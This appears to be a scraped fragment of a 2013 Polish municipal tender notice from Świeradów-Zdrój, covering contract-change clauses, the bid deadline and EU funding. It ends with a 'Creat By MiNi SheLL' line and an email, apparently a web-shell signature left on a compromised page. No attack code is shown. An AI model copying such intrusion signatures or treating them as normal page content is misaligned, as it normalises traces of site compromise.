badania archeologicznego, działaniu siły wyższej, trwaniu nietypowych warunków atmosferycznych, trwaniu warunków geotechnicznych lub geologicznych, podjęciu działań związanych z przeciwdziałaniem zdarzeniom o których mowa w ppkt.e, d, trwaniu przerw w wykonywaniu zamówienia. g) na podstawie zatwierdzonego protokołu konieczności wprowadzenia przez projektanta w trybie nadzoru autorskiego (wraz ze skutkami wprowadzenia takiej zmiany) na podstawie którego wykonawca realizuje roboty budowlane uniemożliwiające wykonanie umowy z zgodnie założonym harmonogramem. h) wystąpienia wad ukrytych dokumentacji projektowej w oparciu o którą wykonywane jest zamówienie, konieczności naniesienia przez projektanta zmian w projekcie, które mają wpływ na termin realizacji zamówienia; przez wady ukryte dokumentacji projektowej rozumie się wady które profesjonalny wykonawca może wykryć poprzez prace w terenie. h) zmiana sposobu wykonania zamówienia w stosunku do sposobu określonego przed zawarciem umowy, dopuszczalna jest na skutek okoliczności, których nie można było przewidzieć w chwili wyboru najkorzystniejszej oferty lub zmiany te są korzystne dla Zamawiającego, a Wykonawca wyrazi na nią zgodę, w szczególności: zaistnienie warunków na terenie budowy wpływających na zakres lub sposób wykonania przedmiotu umowy, termin tj. warunki atmosferyczne, archeologiczne, geologiczne, geotechniczne, hydrologiczne, kolizje z sieciami infrastruktury lub wystąpią inne okoliczności uniemożliwiające wykonanie zamówienia określonego w umowie. i) zmiana sposobu wykonania zamówienia w stosunku do sposobu określonego przed zawarciem umowy - zmiany technologicznie spowodowane w szczególności następującymi i) okolicznościami: pojawienie się na rynku materiałów lub urządzeń nowszej generacji pozwalających na zaoszczędzenie kosztów eksploatacji lub umożliwiające uzyskanie lepszej jakości przedmiotu umowy, bądź pozwalającej na zaoszczędzenie czasu realizacji, konieczności wykonania robót budowlanych przy zastosowaniu innych rozwiązań technicznych lub materiałowych ze względu na zmiany w obowiązującym prawie. j) realizacji w drodze odrębnej umowy prac powiązanych z przedmiotem niniejszej umowy wymuszającej konieczność skoordynowania prac i wzajemnych powiązań. d) zmiany danych osobowych i zmiany osób tj. przedstawicieli Wykonawcy wymienionych w treści umowy, e) zmiany danych teleadresowych, zmiany osób wskazanych do kontaktów między stronami, nie wymienionych w treści umowy, f) zmiana danych związanych z obsługą administracyjną umowy np. zmiana rachunku bankowego, h) w przypadku wystąpienia niesprzyjających i nietypowych warunków atmosferycznych dla okresu i miejsca wykonywanych robót, potwierdzonych wpisem do dziennika budowy, odbiegających od wymagań STWiORB., i) z powodu istotnych braków lub błędów w dokumentacji projektowej, również tych polegających na niezgodności dokumentacji z przepisami prawa, j) z powodu uzasadnionych zamian w zakresie sposobu wykonania przedmiotu zamówienia proponowanych przez Zamawiającego lub Wykonawcę, jeżeli zmiany te są korzystne dla Zmawiającego, k) z powodu działań osób trzecich uniemożliwiających wykonanie prac, które to działania nie są konsekwencją winy którejkolwiek ze stron, 3. Wszystkie powyżej opisane w ust. 2 okoliczności stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody. Warunkiem dokonania zmian postanowień zawartej umowy w formie aneksu do umowy jest zgoda obu stron wyrażona na piśmie, pod rygorem nieważności zmian. 4. O wystąpieniu okoliczności mogących wpłynąć na zmianę terminów Wykonawca winien poinformować Zamawiającego niezwłocznie, tj. w terminie 3 dni roboczych od wystąpienia tych okoliczności i natychmiast odnotować to w dzienniku budowy. 5. Strony z powodów, jakie mogą mieć wpływać na zmianę terminu wykonywania robót, wyłączają niedogodności związane z pogodą typową dla okresu wykonywania robót w miejscu budowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.umswieradowzdroj.nv.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Świeradów-Zdrój ul. 11- go Listopada 35 Świeradów-Zdrój pokój 21a.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.04.2013 godzina 14:00, miejsce: Urząd Miasta Świeradów-Zdrój ul. 11- go Listopada 35 Świeradów-Zdrój sekretariat 1d.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt jest dofinansowany ze środków Unii Europejskiej w ramach Priorytetu nr 6 Wykorzystanie i promocja potencjału turystycznego i kulturowego Dolnego Śląska (Turystyka i Kultura), Działania 6.4 Turystyka kulturowa Regionalnego Programu Operacyjnego dla Województwa Dolnośląskiego na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com